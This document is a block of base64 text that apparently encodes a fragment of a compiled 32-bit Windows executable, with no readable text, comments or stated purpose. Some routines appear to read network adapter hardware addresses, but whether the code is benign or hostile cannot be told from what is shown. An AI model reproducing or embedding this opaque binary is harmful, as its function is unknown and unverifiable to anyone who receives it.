AACLXQiL+YP7/3UHM8DpmgEAAItHJIsIhcl0IItHNIsQA9E7ynMV/wiLfySLB41IAYkPiBiLw+lxAQAAg39UAA+EZAEAAItXEI1PSDkKdRGLR0CLVzxQUFKLz/8VzJBAAIN/RAB1IYt/VA++w1dQ/xUskUAAg8QIg/j/D4QpAQAAi8PpJQEAALkPAAAAM8DGRdQAiF3QiU3oiUXUiUXYx0XkCAAAAIP5EHM
DjUXUxkAIAMdF/AAAAACNX0yLRdSLVeiLyIP6EHMFjU3Ui8EDTeSNVcxSUVCNRchQjU3RUYtPRI1V0FJT/xXUkEAAhcAPiK0AAACD+AF/ZItV6ItF1IvIg/oQcwONTdSLdcwr8XQjg/oQcwONRdSLT1RRVmoBUP8VSJFAAIPEEDvwdXSLVeiLRdSNTdDGR0kBOU3IdVWF9g+Fev///4N95CCNTdRzVFZqCOgu9v//6V7///+D+AN1P4tXVItF0FJQ6Nfv//+DxAiEwHQPi3UIjU3U6MXd//+LxusnjU3Ug87/6Lbd//+LxusYjU3U6Krd//+LRQjrC41N1Oid3f//g8j/i030ZIkNAAAAAFlfXluLTfAzzeiVOwAAi+VdwgQAzMzMzMzMzMzMzMzMVYvsU1aL8YtOII1GSFc5AXUag30UAXUUg35EAHUOi10Mi30Qg8P/g9f/6waLfRCLXQyDflQAD4SKAAAAi87oXfv//4TAdH+L0wvXdQaDfRQBdBeLRRSLTlRQV1NR/xVQkUAAg8QQhcB1XItGVI1VDFJQ/xVMkUAAg8QIhcB1R4tOEI1GSDkBdRSLVjyLRkCJEYtOIIkBi1YwK8CJAotFCItNDItVEF+JSAiLTkxexwAAAAAAx0AEAAAAAIlQDIlIEFtdwhQAiw2ckEAAi0UIixGLSQRfiUgEM8leiRCJSAiJSAyJSBBbXcIUAMzMzMzMVYvsg+wIi0UUU4tdEFaL8YtNGDPSV4t9DIlF+IlN/DlWVA+EigAAAIvO6IH6//+EwHR9i0ZUjVX4UlD/FVSRQACDxAiFwHVoi88Ly3QVi1ZUagFTV1L/FVCRQACDxBCFwHVNi05UjUX4UFH/FUyRQACDxAiFwHU4i1Uci86JVkzo2+f//4tFCItN+ItV/F+JSAiLTkxexwAAAAAAx0AEAAAAAIlIEIlQDFuL5V3CIAAz0otFCIsNnJBAAIsxi0kEX4kwXolIBIlQCIlQEIlQDFuL5V3CIADMzMzMzMzMzMxVi+xWV4t9CIvxO/d0YYN+FBByC4sGUOiyOQAAg8QEx0YUDwAAAMdGEAAAAADGBgCDfxQQcxKLTxBBUVdW/xUAkkAAg8QM6wqLF4kWxwcAAAAAi0cQiUYQi08UiU4Ux0cUDwAAAMdHEAAAAADGBwBfi8ZeXcIEAMzMzMzMzMzMzFNWi/Ez21eL/jleVHQc6D35//+EwHUCM/+LRlRQ/xVYkUAAg8QEhcB0AjP/i86IXlCIXkn/FVSQQACJXlSLDRDDQACLx1+JXkSJTkxeW8PMU4vZg3tkAFZXjXsQdB+NSxDo6vj//4TAdQIz/4tDZFD/FViRQACDxASFwHQCM/+NSxDGQ2AAxkNZAP8VVJBAADPAiUNkiw0Qw0AAiUtciUNUO/h1EIsTi0oEUGoCA8v/FSCRQABfXlvDzMzMzMzMzFWL7Gr/aPl8QABkoQAAAABQUVahsMJAADPFUI1F9GSjAAAAAIvxiXXwxwbMkkAAg35UAMdF/AAAAAB0HotOEI1WSDkRdRSLVjyLRkCJEYtOIIkBi1YwK8CJAoB+UAB0B4vO6Nn+//+LzsdF/P//////FXSQQACLTfRkiQ0AAAAAWV6L5V3DzMzMzMzMzMzMzFWL7Gr/aPl8QABkoQAAAABQUVahsMJAADPFUI1F9GSjAAAAAIvxiXXwxwbMkkAAg35UAMdF/AAAAAB0HotOEI1WSDkRdRSLVjyLRkCJEYtOIIkBi1YwK8CJAoB+UAB0B4vO6En+//+LzsdF/P//////FXSQQAD2RQgBdAlW6Hw3AACDxASLxotN9GSJDQAAAABZXovlXcIEAMzMzMzMzMxVi+xq/2iWfUAAZKEAAAAAUIHs6AAAAKGwwkAAM8WJRfBTV1CNRfRkowAAAACLRQgz24ld0MdGFA8AAACJXhCJdcCJRciIHotAENHoiV38x0XQAQAAAIlFxIv7D4TRAQAAjYVw////jY0o////iUW
8iU24ixW8kEAAiV3Mx4UQ////GJNAAMeFIP///xCTQACJlXD///+DTdACU42FKP///1CNjRD////HRfwBAAAA/xXEkEAAi40Q////i1EEjY0o////x0X8AgAAAMeEFRD///8Mk0AA/xWgkEAAx4Uo////jJJAAImdZP///4mdaP///2oCjQQ/UI1N1FGLTcjHRfwEAAAA6HX4//9QaLAeQACNjSD////GRfwF/xXckEAAUOgp4P//g8QIg33oEMZF/ARyDItV1FLoITYAAIPEBI1FzFCNjRD/////FdiQQACLVhSD+hByBIsO6wKLzotGEAPBg/oQcgSLDusCi847w3UEM8DrAivBi03MUWoBUIvO6Kry//+LlRD///+LQgTHhAUQ////DJNAAMdF/AYAAADHhSj///+MkkAA9oVo////AcZF/Ad0EYuNOP///4sBUOiYNQAAg8QEU1NTjY0o/////xXMkEAAi5U8////iRqLhUz///+JGIuNXP///4kZg6Vo/////o2NKP///4mdZP///8ZF/Ab/FXSQQACNjSj///+IXfz/FayQQACNjXD/////FcCQQABHO33ED4JB/v//i8aLTfRkiQ0AAAAAWV9bi03wM83o+DQAAIvlXcPMVYvsav9o6X1AAGShAAAAAFCB7GAEAAChsMJAADPFiUXsU1ZXUI1F9GSjAAAAAIll8ItNKImNlPv//zPbU2g6k0AAiV386DbY//++DwAAAIm15Pv//4md4Pv//4id0Pv//4tNHItFCL8QAAAAxkX8AjvPcwONRQgDRRg7z4tNCHMDjU0Ii5WU+///UlBRjY20+///ibXI+///iZ3E+///iJ20+///6Lb1///GRfwDOF0kdA2Nhez7//9QU1NqI+sLjY3s+///UVNTahpT/xUckkAAjYXs+///ibWs+///iZ2o+///iJ2Y+///jVABjUkAighAOst1+SvCUI2V7Pv//1KNjZj7///odNf//42FmPv//1CNjdD7///GRfwE6B76///GRfwDOb2s+///cg+LjZj7//9R6NQzAACDxARqAWg4k0AAjY3Q+///6HHv//+LhdD7//85veT7//9zBo2F0Pv//4s1XJFAAFD/1oPEBGoCaDSTQACNjdD7///oP+///2oCaDCTQACNjdD7///oLe///2oCaCyTQACNjdD7///oG+///2oDaCiTQACNjdD7///oCe///2oBaDiTQACNjdD7///o9+7//4uF0Pv//zm95Pv//3MGjYXQ+///UP/Wg8QEav9TjZW0+///Uo2N0Pv//+jY7f//agFoOJNAAI2N0Pv//+i27v//i4XQ+///Ob3k+///cwaNhdD7//9Q/9aDxARq/1ONhbT7//9QjY3Q+///6Jft//9qBGggk0AAjY3Q+///6HXu//85vcj7//9yD4uNtPv//1HorzIAAIPEBIuNlPv//2r/U42V0Pv//1LHRfwBAAAA6BLV//85veT7//9yD4uF0Pv//1DofDIAAIPEBMeF5Pv//w8AAACJneD7//+IndD7//85fRxyDItNCFHoVTIAAIPEBLAB6xu4hj9AAMONjdD7///oD9T//41NCOgH1P//MsCLTfRkiQ0AAAAAWV9eW4tN7DPN6AAyAACL5V3DzMzMzMzMzMzMVYvsav9ob35AAGShAAAAAFCB7NQAAAChsMJAADPFiUXsU1ZXUI1F9GSjAAAAAIll8ItNCIt9EDPbi8GJvST////HRawPAAAAiV2oiF2YjXABihBAOtN1+SvGUFGNTZjoHNX//4tFDFCD7ByLzImlIP///2r/iB+IXx6IX0CIX0qIX2iJXzxTjVWYiV38x0EUDwAAAIlZEFLGRfwBiBno7dP//+g4IgAAg8QgOsN1GYN9rBByDItFmFDoUDEAAIPEBDLA6RkEAABqAVNoPJNAAI1NmOhY5P//i/BqAY1OAVFoPJNAAI1NmOhD5P//i/hqAY1XAVJoPJNAAI1
NmOgu5P//iYUg////agFAUGg8k0AAjU2Y6Bfk//+D/v91AjP2g///dQIz/4uNIP///4P5/3UIM8mJjSD///+D+P91AjPAO/N1Gzv7dRc7y3UTO8N1D41NmOiH0v//MsDpgQMAAFZTjYUo////UI1NmOi/8v//g708////EIuVKP///8ZF/AJzBo2VKP///4uNJP///4PBSooCiAFCQTrDdfaLzyvOSVFGVo2VYP///1KNTZjofPL//4O9dP///xCLlWD////GRfwDcwaNlWD///+LjST///+KAogBQkE6w3X2i7Ug////i8Yrx0hQR1eNjXz///9RjU2Y6Dby//+DfZAQi5V8////xkX8BHMGjZV8////i70k////jU8ejaQkAAAAAIoCiAFCQTrDdfaLVahSRlaNRdBQjU2Y6PTx//+LVdC+EAAAAMZF/AU5deRzA41V0I1PaIoCiAFCQTrDdfaLTeCDwfFRag+NVbRSjU3Q6L7x//+LVbTGRfwGOXXIcwONVbSNT0CKAogBQkE6w3X2i0XEg8D9UGoDjY1E////UY1NtOiK8f//OXAUcgKLAFD/FfyRQACDxASJRzw5tVj///9yD4uVRP///1LoQC8AAIPEBGoDU42FRP///1CNTbToTfH//4vwjU20O850XL8QAAAAOX3IcgyLVbRS6A8vAACDxATHRcgPAAAAiV3EiF20OX4UcxWLRhBAUI1FtFZQ/xUAkkAAg8QM6weLDolNtIkei1YQiVXEi0YUiUXIx0YUDwAAAIleEIgevhAAAADGRfwGObVY////cg+LjUT///9R6KkuAACDxASLVbQ5dchzA41VtIu9JP///41PQI1kJACKAogBQkE6w3X2ag9TjZVE////Uo1N0OiU8P//i/CNRdA7xnRZg33kEHIMi03QUehaLgAAg8QEx0XkDwAAAIld4Ihd0IN+FBBzFYtWEEJSjUXQVlD/FQCSQACDxAzrB4sOiU3QiR6LVhCJVeCLRhSJReTHRhQPAAAAiV4QiB6DvVj///8Qcg+LjUT///9R6PstAACDxASDfeQQi03QcwONTdCNV2iKAYgCQUI6w3X2vxAAAAA5fchyDItVtFLozC0AAIPEBL4PAAAAiXXIiV3EiF20OX3kcgyLRdBQ6K0tAACDxASJdeSJXeCIXdA5fZByD4uNfP///1HokC0AAIPEBIl1kIldjIidfP///zm9dP///3IPi5Vg////UuhtLQAAg8QEibV0////iZ1w////iJ1g////Ob08////cg+LhSj///9Q6EQtAACDxASDfawQcgyLTZhR6DItAACDxASwAYtN9GSJDQAAAABZX15bi03sM83o+iwAAIvlXcO4jURAAMPMzMzMzMzMzMzMzMzMVYvsav9o3X5AAGShAAAAAFCD7AhWV6GwwkAAM8VQjUX0ZKMAAAAAi/mJfewzwIlF8DlFFHQixwdIk0AAiw24kEAAiU9oixW8kEAAiVdoiUX8x0XwAQAAAFBQjXcQVovP/xXkkEAAiweLSATHBA9Ek0AAi87HRfwBAAAAiXUU/xWgkEAAMsCLzsZF/ALHBsySQACIRlCIRkn/FVSQQADHRlQAAAAAixUQw0AAiVZMx0ZEAAAAAItFEItNDItVCFCDyQFRUovOxkX8A+hx4v//hcB1EFCLB4tIBGoCA8//FSCRQACLx4tN9GSJDQAAAABZX16L5V3CEADMzMzMzMzMzFWL7Gr/aBV/QABkoQAAAABQg+wIVqGwwkAAM8VQjUX0ZKMAAAAAiU3wi0GYi1AEx0QKmESTQACNcajHRfwAAAAAiXXsxwbMkkAAg35UAMZF/AF0HotOEI1WSDkRdRSLVjyLRkCJEYtOIIkBi1YwK8CJAoB+UAB0B4vO6DHy//+LzsZF/AD/FXSQQACLRvCLSASLFeiQQACJVDHwi030ZIkNAAAAAFlei+Vdw8zMzMzMVo1xaIvO6EX///+hvJBAAIkGiw24kEA
AVokO/xW0kEAAg8QEXsPMzMzMzMzMzMzMVYvsVleNeZiNd2iLzugO////obyQQACJBosNuJBAAFaJDv8VtJBAAIPEBPZFCAF0CVfo5yoAAIPEBIvHX15dwgQAzMzMzMzMzMzMzMzMzMxVi+xq/2h9f0AAZKEAAAAAUIHsUAYAAKGwwkAAM8WJRexTVldQjUX0ZKMAAAAAiWXwi0UMi30IM9uJhQT7//+IGIvHjVABighAhMl1+SvCdQiDyP/pyAcAAI2FbP///1Doa9f//7gPAAAAg8QEiYUs+///iZ0o+///iJ0Y+///iV38iYVk+///iZ1g+///xoVQ+///AI2NGPv//1FTg+wci8zGhWz7//8AiUEUi8eJWRDGRfwBiaUM+///xgEAjXABihBAhNJ1+SvGUFfob83//+jq9P//i4UY+///g8Qkg70s+///EHMGjYUY+///agFqQGohUI2NVPr//+jQ/P//xkX8AjmduPr//3RfagJTU42NVPr///8V9JBAAI2VOPv//1KNjVT6////FfCQQACLcAgDMFNTU42NVPr///8V9JBAAIvGmVJQjYVs+///UI2NVPr///8V7JBAAI2NVPr//+hq8P//6XYBAACNjRj7//9RagGD7ByLzIvHx0EUDwAAAIlZEImlDPv//8YBAI1wAYoQQITSdfkrxlBX6J/M///oGvT//4uFGPv//74QAAAAg8QkxkX8Azm1LPv//3MGjYUY+///agFqQGohUI2NpPn//+j4+///xkX8BDmdCPr//w+FhAAAAI2NDPr//8ZF/APo2fz//42NDPr///8VwJBAAI2NvPr//8ZF/AHovvz//42NvPr///8VwJBAADm1ZPv//3IPi5VQ+///UuicKAAAg8QEx4Vk+///DwAAAImdYPv//8aFUPv//wA5tSz7//8PgsQFAACLhRj7//9Q6GooAACDxATpsAUAAGoCU1ONjaT5////FfSQQACNjTj7//9RjY2k+f///xXwkEAAi3AIAzBTU1ONjaT5////FfSQQACLxplSUI2VbPv//1KNjaT5////FeyQQACNjaT5///oCu///42NDPr//8ZF/APo+/v//42NDPr///8VwJBAAMdF/AIAAACB/oIAAAB9b42NvPr//8ZF/AHo0fv//42NvPr///8VwJBAAL4QAAAAObVk+///cg+LhVD7//9Q6KonAACDxATHhWT7//8PAAAAiZ1g+///xoVQ+///ADm1LPv//3IPi40Y+///Ueh8JwAAg8QEuPz////pwgQAAFaNlWz7//9SjY00+///x4VI+///DwAAAImdRPv//8aFNPv//wDot8r//42FNPv//1CNjVD7///GRfwG6GHt//+DvUj7//8QxkX8AnIPi400+///UegWJwAAg8QEjZVQ+///Uo21NPv//+ij7///g8QEUI2NUPv//8ZF/AfoIO3//4O9SPv//xDGRfwCcg+LhTT7//9Q6NUmAACDxASKF4pfATPJOY1g+///djbrA41JAIO9ZPv//xCLhVD7//9zBo2FUPv//zAUCA+2wg+vwI1EQAoPtvOZQff+O41g+///cs+LtWT7//+LvVD7///GhRP7//8Ax4UM+///AAAAAIv/x4UI+///AAAAAI2bAAAAADPbiZ0U+///i8+D/hBzBo2NUPv//4uFDPv//4uVCPv//40EQAPAigwBjRRSA9I6jBVs////dQW7AQAAAIvPg/4QcwaNjVD7//+APAEAdQrHhRT7//8BAAAAi8+D/hBzBo2NUPv//4pMAQE6jBVt////dQFDi8+D/hBzBo2NUPv//4B8AQEAdQb/hRT7//+Lz4P+EHMGjY1Q+///ikwBAjqMFW7///91AUOLz4P+EHMGjY1Q+///gHwBAgB1Bv+FFPv//4vPg/4QcwaNjVD7//+KTAEDOowVb////3UBQ4vPg/4QcwaNjVD7//+AfAEDAHUG/4UU+///i8+D/hBzBo2NUPv
//4pMAQQ6jBVw////dQFDi8+D/hBzBo2NUPv//4B8AQQAdQb/hRT7//+Lz4P+EHMGjY1Q+///ikwBBTqMFXH///91AUOLz4P+EHMGjY1Q+///gHwBBQB1Bv+FFPv//4P7BnUIOZ0U+///dRiLhQj7//9AiYUI+///g/gKD4x7/v//6wfGhRP7//8Bi4UM+///QImFDPv//4P4Cg+MTP7//4C9E/v//wB1c42NvPr//8ZF/AHopPj//42NvPr///8VwJBAAL4QAAAAObVk+///cg+LlVD7//9S6H0kAACDxATHhWT7//8PAAAAx4Vg+///AAAAAMaFUPv//wA5tSz7//9yD4uFGPv//1DoSyQAAIPEBLj+////6ZEBAACLx4P+EHMGjYVQ+///i41g+///A8iLx4P+EHMGjYVQ+///i5UE+///UlGDwDy+DwAAADP/UI2NNPv//4m1SPv//4m9RPv//8aFNPv//wDoPeX//7sQAAAAxkX8CDmdZPv//3IPi4VQ+///UOjOIwAAg8QEi4VI+///ibVk+///ib1g+///xoVQ+///ADvDcyeLhUT7//9AUI2NNPv//1GNlVD7//9S/xUAkkAAi4VI+///g8QM6wyLjTT7//+JjVD7//+LlUT7//+LjVD7//+JlWD7//+JhWT7//87w3MGjY1Q+///i5UE+///6wONSQCKAYgCQUKEwHX2jY28+v//xkX8Aeg39///jY28+v///xXAkEAAOZ1k+///cg+LhVD7//9Q6BUjAACDxASJtWT7//+JvWD7///GhVD7//8AOZ0s+///cg+LjRj7//9R6OsiAACDxAQzwOs3x0X8AgAAALj3TkAAw42NVPr//8ZF/AHoevf//42NUPv//+iPxP//jY0Y+///6ITE//+4/f///4tN9GSJDQAAAABZX15bi03sM83oeiIAAIvlXcPMzMxVi+xRVos1ZJFAAFdoiAIAAMdF/IgCAAD/1ov4g8QEhf91CV+DyP9ei+Vdw41F/FBX6GQsAACD+G91Flf/FWCRQACLTfxR/9aL+IPECIX/dNKNVfxSVzP26D0sAACFwHU7i8eF/3RDi00IjZsAAAAAg/48fSeDuKABAAAGdRiLkJQBAACJFA5mi5CYAQAAZolUDgSDxgaLAIXAddSF/3QKV/8VYJFAAIPEBF8zwF6L5V3DzMzMzMz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5///pQwIAAItNsItFnIvQg/kQcwONVZwPvhKD6jCJlTz///+L0IP5EHMDjVWcD75SAYPqMImVKP///4vQg/kQcwONVZwPvlICg+owiZUw////i9CD+RBzA41VnA++UgOD6jCJlTj///+L0IP5EHMDjVWcD75SBIPqMImVLP///4P5EHMDjUWcD75wBWoQaHSTQACNTbiD7jDHRcwPAAAAiV3IiF246Oa4//+LjSD///9q/40E/QAAAAArx41UgeRTUo1N1MZF/ALHRegPAAAAiV3kiF3U6Ma3//+LhSz///+LjTj///+LlTD///9WUIuFKP///1GLjTz///9Si1UQUIuFNP///1GLTLj8UsZF/AP/0YPEHDhdGHQpi40k////jVW4UlCNvWT////o8Pz//4PECMZF/ATHhUT///8CAAAA6yBQjbVI////6GH5//+DxATHRfwFAAAAx4VE////BAAAAL8PAAAAUI1NgIl9lIldkIhdgOjW2v//x0X8BgAAAPaFRP///wR0MYOlRP////uDvVz///8Qcg+LhUj///9Q6HgUAACDxASJvVz///+JnVj///+InUj////2hUT///8CxkX8CHQxg6VE/////YO9eP///xByD4uNZP///1HoOhQAAIPEBIm9eP///4mddP///4idZP///4u1QP///41VgIl+FIleEFKLzoge6D7a//+DjUT///8Bg32UEHIMi0WAUOj2EwAAg8QEaKATQABqAmocjU24UYl9lIldkIhdgMZF/AHoTBcAAIN9sBByDItVnFLoxRM
AAIPEBIvGi030ZIkNAAAAAFlfXluLTfAzzeiNEwAAi+Vdw8zMzMzMzFWL7Gr/aJCBQABkoQAAAABQg+xQobDCQAAzxYlF8FNXUI1F9GSjAAAAAItFCGoBiUWki0UMagCJTaxoPJNAAIvOiVWwiUWo6HTG//+L+GoBjU8BUWg8k0AAi87oYMb//4vYagGNUwFSaDyTQACLzuhMxv//iUW0agFAUGg8k0AAi87oOcb//4P//3UCM/+D+/91AjPbg320/3UHx0W0AAAAAIP4/3UCM8CF/3UUhdt1EDldtHULhcB1BzLA6eoAAABXagCNRdRQi87o8dT//4tNpFDHRfwAAAAA6PHY//+DfegQx0X8/////3IMi03UUeipEgAAg8QEi9Mr10pSR1eNRdRQi87otdT//4tNrFDHRfwBAAAA6LXY//+DfegQx0X8/////3IMi03UUehtEgAAg8QEi320i9cr00pSQ1ONRdRQi87odtT//4tNsFDHRfwCAAAA6HbY//+7EAAAAMdF/P////85XehyDItN1FHoKhIAAIPEBItGEFBHV41VuFKLzug41P//i02oUMdF/AMAAADoONj//zldzHIMi0W4UOj4EQAAg8QEsAGLTfRkiQ0AAAAAWV9bi03wM83owREAAIvlXcPMzMzMzMzMzMzMVYvsav9o64FAAGShAAAAAFCD7EShsMJAADPFiUXwU1ZXUI1F9GSjAAAAAIt1GDPbiV38g/4KD4PbAAAAjWQkAGoBaFCTQACNTdTHRegPAAAAiV3kiF3U6OS0//+NRQhQjU3UUY1VuFLGRfwB6D/1//+DxAyL8I1FCL8QAAAAO8Z0Vzl9HHIMi00IUeg+EQAAg8QEx0UcDwAAAIldGIhdCDl+FHMVi0YQQFCNVQhWUv8VAJJAAIPEDOsHiwaJRQiJHotOEIlNGItWFIlVHMdGFA8AAACJXhCIHjl9zHIMi0W4UOjnEAAAg8QEx0XMDwAAAIldyIhduIhd/Dl96HIMi03UUejGEAAAg8QEi3UYg/4KD4Ip////M8mLxrocAAAA9+IPkMH32QvIM8CDwQQPksD32AvBUOhtEAAAg8QEiUWwxkX8AzvDdB1ooBNAAGggKUAAVo14BGocV4kw6EgUAACJfbDrA4ldsDP/iF38OV0YD4aXAAAAi3Wwg8bkjUkAM9KLx/d1JIXSdRSDxhyDfhQQiV4QcgSLBusCi8aIGIN9HBCLRQhzA41FCIoMOI1FtIhNtIhdtcdF6A8AAACJXeSIXdSNUAGKCEA6y3X5K8JQjVW0Uo1N1Ohjs///av9TjUXUUIvOxkX8BOihyv//g33oEIhd/HIMi03UUejNDwAAg8QERzt9GA+Ccv///4N9HBByDItVCFLosQ8AAIPEBItFsItN9GSJDQAAAABZX15bi03wM83oeA8AAIvlXcPMVYvsav9oGIJAAGShAAAAAFBRobDCQAAzxVCNRfRkowAAAACLRSQz0olV8EkPr8hQUVaNTQiJVfzoc9H//4N9HBByDItFCFDoQg8AAIPEBIvGi030ZIkNAAAAAFmL5V3DVYvsav9oG4RAAGShAAAAAFCB7DADAAChsMJAADPFiUXwU1ZXUI1F9GSjAAAAAItFJImFzPz//4tVCDPbg30cEIld/HMDjVUIvw8AAACLwom95P7//4md4P7//4id0P7//41wAYoIQDrLdfkrxlBSjY3Q/v//6Cay//+Jvaz+//+Jnaj+//+InZj+//+JvQD///+Jnfz+//+Inez+//+Jvcj+//+JncT+//+InbT+//+JvRz///+JnRj///+InQj///+Bvcz8//+ghgEAxkX8BQ+NjgAAAL4QAAAAib0c////iZ0Y////iJ0I////ib3I/v//iZ3E/v//iJ20/v//ib0A////iZ38/v//iJ3s/v//ib2s/v//iZ2o/v//iJ2Y/v//ObXk/v//cg+LjdD+//9R6PcNAACDxASJveT+//+JneD
